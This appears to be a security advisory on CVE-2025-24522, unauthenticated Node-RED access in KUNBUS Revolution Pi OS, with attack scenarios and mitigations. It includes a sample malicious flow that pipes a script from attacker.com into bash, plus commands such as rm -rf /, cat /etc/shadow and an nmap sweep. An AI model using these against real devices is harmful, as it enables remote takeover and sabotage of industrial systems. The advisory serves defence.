Critical Vulnerability in KUNBUS Revolution Pi OS
Overview
A critical security vulnerability, CVE-2025-24522, has been identified in KUNBUS Revolution Pi OS Bookworm (01/2025 release). The flaw stems from missing authentication in the Node-RED server, allowing unauthenticated attackers to gain full control over the Node-RED instance and execute arbitrary commands on the underlying operating system.
With a CVSS-B score of 9.3 (CRITICAL), this vulnerability poses a severe risk to industrial systems and IoT deployments using Revolution Pi devices.(Published Date:05/01/2025)
Technical Details
Root Cause
The Node-RED instance in Revolution Pi OS does not enforce authentication by default, meaning:
The Node-RED dashboard is accessible without credentials.
Attackers can inject malicious flows, modify existing ones, or execute system commands via Node-RED functions.
Since Node-RED often runs with elevated privileges, this can lead to full system compromise.
Affected Versions
KUNBUS Revolution Pi OS Bookworm (01/2025 release)
Earlier versions may also be vulnerable if Node-RED was not manually secured.
Attack Scenarios
Scenario 1: Remote Exploitation via Exposed Node-RED Dashboard
Discovery: An attacker scans the local network or internet-facing Revolution Pi devices and finds an exposed Node-RED dashboard (
http://<target-ip>:1880).Unauthenticated Access: Since no authentication is required, the attacker accesses the Node-RED editor.
Malicious Flow Injection:
The attacker creates a new flow with an "exec" node configured to run OS commands (e.g.,
rm -rf /,wget malware.sh, orreverse shell).Example malicious flow:
[ { "id": "inject-node", "type": "inject", "payload": "malicious_command", "wires": [["exec-node"]] }, { "id": "exec-node", "type": "exec", "command": "sh -c 'curl http://attacker.com/malware.sh | bash'", "wires": [] } ]
Deployment & Execution:
The attacker deploys the flow, triggering command execution on the Revolution Pi.
The attacker gains remote shell access, exfiltrates data, or disrupts operations.
Scenario 2: Lateral Movement in Industrial Networks
Initial Access: An attacker compromises a weakly secured Revolution Pi in a factory network.
Privilege Escalation:
Using Node-RED, the attacker runs:
cat /etc/shadow # Extract password hashes sudo su - # Gain root if Node-RED runs as sudo
Pivoting:
The attacker scans internal networks (
nmap -sn 192.168.1.0/24) and exploits other devices.They deploy ransomware or sabotage industrial processes.
Mitigation & Fixes
Immediate Actions
Enable Node-RED Authentication:
Edit
/home/pi/.node-red/settings.jsand set:adminAuth: { type: "credentials", users: [{ username: "admin", password: "$2a$08$hashed_password", permissions: "*" }] }
Generate a hashed password using:
node-red-admin hash-pw
Restrict Network Access:
Use a firewall to block unauthorized access to port
1880.Example (
ufw):sudo ufw deny 1880 sudo ufw allow from 192.168.1.0/24 to any port 1880
Update Revolution Pi OS:
Check for patches from KUNBUS and apply them immediately.
Long-Term Best Practices
Disable Node-RED if unused.
Monitor for suspicious flows (e.g., unexpected
execnodes).Segment industrial networks to prevent lateral movement.
Conclusion
CVE-2025-24522 is a critical vulnerability that exposes Revolution Pi devices to remote code execution (RCE) due to missing Node-RED authentication. Attackers can take full control of affected systems, making this a high-priority issue for industrial and IoT environments.
Recommendation: Apply mitigations immediately and monitor for updates from KUNBUS.